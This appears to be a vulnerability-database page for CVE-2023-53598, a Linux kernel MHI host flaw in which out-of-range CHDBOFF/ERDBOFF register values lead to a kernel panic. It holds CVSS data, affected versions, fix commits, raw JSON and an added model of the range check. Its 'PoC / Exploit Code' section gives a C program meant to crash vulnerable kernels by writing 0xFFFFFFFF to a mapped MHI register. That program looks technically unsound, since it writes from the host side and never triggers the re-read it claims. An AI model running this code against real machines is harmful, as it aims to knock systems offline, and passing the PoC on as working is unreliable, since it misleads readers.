Security Vulnerability Report
CVE-2023-53598 CVSS 5.5 MEDIUM

CVE-2023-53598

Published: 2025-10-04 16:15:56
Last Modified: 2026-03-21 00:55:41
Source: 416baaa9-dc9f-4396-8d5f-8c081fb06d67

Description

In the Linux kernel, the following vulnerability has been resolved:

bus: mhi: host: Range check CHDBOFF and ERDBOFF

If the value read from the CHDBOFF and ERDBOFF registers is outside the range of the MHI register space then an invalid address might be computed which later causes a kernel panic. Range check the read value to prevent a crash due to bad data from the device.
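The range check the description calls for, shown as a user-space model. This is an added example, not the kernel's patch or code from this record; `reg_window`, `db_array_checked`, `check_sample`, the 8-byte doorbell size and the 4-byte alignment rule are assumptions made for illustration.

```c
#include <errno.h>
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>

#define DB_SIZE 8u /* assumed bytes per doorbell register pair */

/* Hypothetical model of the host's mapped register space. */
struct reg_window {
    uint8_t *base; /* start of the mapping */
    size_t len;    /* number of bytes mapped */
};

/*
 * Turn a device-reported doorbell offset into a pointer only if the whole
 * doorbell array [off, off + ndb * DB_SIZE) lies inside the mapping.
 */
int db_array_checked(const struct reg_window *w, uint32_t off,
                     uint32_t ndb, uint8_t **out)
{
    size_t span = (size_t)ndb * DB_SIZE;

    if (ndb == 0 || span / DB_SIZE != ndb || span > w->len)
        return -ERANGE;              /* the array itself cannot fit */
    if ((size_t)off > w->len - span) /* subtraction form: off + span cannot wrap */
        return -ERANGE;
    if (off % 4 != 0)
        return -EINVAL;              /* assumed 32-bit register alignment */
    *out = w->base + off;
    return 0;
}

/* Constructed stand-in for a 4 KiB register mapping. */
static uint8_t fake_mmio[0x1000];

int check_sample(uint32_t off, uint32_t ndb)
{
    struct reg_window w = { fake_mmio, sizeof(fake_mmio) };
    uint8_t *db = NULL;
    return db_array_checked(&w, off, ndb, &db);
}

int main(void)
{
    printf("0x0800/16     -> %d\n", check_sample(0x0800, 16));      /* in range */
    printf("0x0ff8/16     -> %d\n", check_sample(0x0ff8, 16));      /* tail overruns */
    printf("0xffffffff/16 -> %d\n", check_sample(0xffffffffu, 16)); /* far outside */
    return 0;
}
```

Checking the end of the array, not only its start, is what rejects an offset such as 0x0ff8 that lies inside the mapping but leaves no room for the doorbells behind it.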

CVSS Details

CVSS Score: 5.5
Severity: MEDIUM
CVSS Vector: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H

Configurations (Affected Products)

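cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:* (from 5.7 up to, but excluding, 5.10.192) - VULNERABLE
cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:* (from 5.11 up to, but excluding, 5.15.112) - VULNERABLE
cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:* (from 5.16 up to, but excluding, 6.1.28) - VULNERABLE
cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:* (from 6.2 up to, but excluding, 6.2.15) - VULNERABLE
cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:* (from 6.3 up to, but excluding, 6.3.2) - VULNERABLE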
Linux Kernel < 6.6 (fix commit: 2343385fe6eed11d0432ab42a97b3ca4aef06a99)
Linux Kernel stable branch (fix commit: 372f1752b74572b0a9d2288841eab7db17daccae)
Linux Kernel stable branch (fix commit: 4e584127ec2bd42a37c88badb49df409f21fa40a)
Linux Kernel stable branch (fix commit: 6a0c637bfee69a74c104468544d9f2a6579626d0)
Linux Kernel stable branch (fix commit: 83bf6b87e2dd053d95d89eb2f01ae885f9e568db)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```c
/*
 * CVE-2023-53598 PoC - Trigger kernel panic via invalid CHDBOFF/ERDBOFF values
 *
 * This PoC demonstrates how a malicious MHI device can trigger a kernel panic
 * by providing out-of-range values in CHDBOFF or ERDBOFF registers.
 *
 * Note: This requires hardware-level access to manipulate MHI device registers,
 * typically via a PCIe device emulating MHI functionality.
 */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <fcntl.h>
#include <unistd.h>
#include <sys/mman.h>
#include <stdint.h>

// MHI register offsets (simplified)
#define MHI_CHDBOFF 0x18
#define MHI_ERDBOFF 0x1C

// Invalid/out-of-range value that triggers the vulnerability
#define INVALID_OFFSET 0xFFFFFFFF

int main(int argc, char *argv[])
{
    int fd;
    volatile uint32_t *regs;

    // Open MHI device (e.g., /dev/mhi_device or via sysfs)
    fd = open("/dev/mhi_qti", O_RDWR);
    if (fd < 0) {
        perror("Failed to open MHI device");
        return 1;
    }

    // Map device registers into user space
    regs = (volatile uint32_t *)mmap(NULL, 4096, PROT_READ | PROT_WRITE,
                                     MAP_SHARED, fd, 0);
    if (regs == MAP_FAILED) {
        perror("mmap failed");
        close(fd);
        return 1;
    }

    // Write invalid CHDBOFF value to trigger out-of-range access
    // On vulnerable kernels, this will cause kernel panic
    printf("Writing invalid CHDBOFF value: 0x%X\n", INVALID_OFFSET);
    regs[MHI_CHDBOFF / 4] = INVALID_OFFSET;

    // Trigger MHI host initialization which reads the bad offset
    // This will cause the kernel to compute an invalid address
    // and panic when accessing it
    sleep(1);

    printf("Kernel should have panicked if vulnerable\n");

    munmap((void *)regs, 4096);
    close(fd);
    return 0;
}
```

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2023-53598", "sourceIdentifier": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "published": "2025-10-04T16:15:56.383", "lastModified": "2026-03-21T00:55:41.447", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "In the Linux kernel, the following vulnerability has been resolved:\n\nbus: mhi: host: Range check CHDBOFF and ERDBOFF\n\nIf the value read from the CHDBOFF and ERDBOFF registers is outside the\nrange of the MHI register space then an invalid address might be computed\nwhich later causes a kernel panic. Range check the read value to prevent\na crash due to bad data from the device."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", "baseScore": 5.5, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "NVD-CWE-noinfo"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "5.7", "versionEndExcluding": "5.10.192", "matchCriteriaId": "1CDFCD3A-0AA3-43ED-A57A-F15D2BD10149"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "5.11", "versionEndExcluding": "5.15.112", "matchCriteriaId": "8612AB29-948C-4D53-84D9-6CA2E4A8B015"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "5.16", "versionEndExcluding": "6.1.28", "matchCriteriaId": "08F855F4-7188-4EE1-BD79-D4B6C7E2EF54"}, {"vulnerable": true, 
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.2", "versionEndExcluding": "6.2.15", "matchCriteriaId": "3844A90B-940D-46C3-8D7B-9FF63F1AFC2F"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.3", "versionEndExcluding": "6.3.2", "matchCriteriaId": "38F6F330-91A0-4675-8B90-6F950471A7CC"}]}]}], "references": [{"url": "https://git.kernel.org/stable/c/2343385fe6eed11d0432ab42a97b3ca4aef06a99", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/372f1752b74572b0a9d2288841eab7db17daccae", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/4e584127ec2bd42a37c88badb49df409f21fa40a", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/6a0c637bfee69a74c104468544d9f2a6579626d0", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/83bf6b87e2dd053d95d89eb2f01ae885f9e568db", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/a2cbb1a45a0c86ce77839c0875414efe1a89315e", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}]}}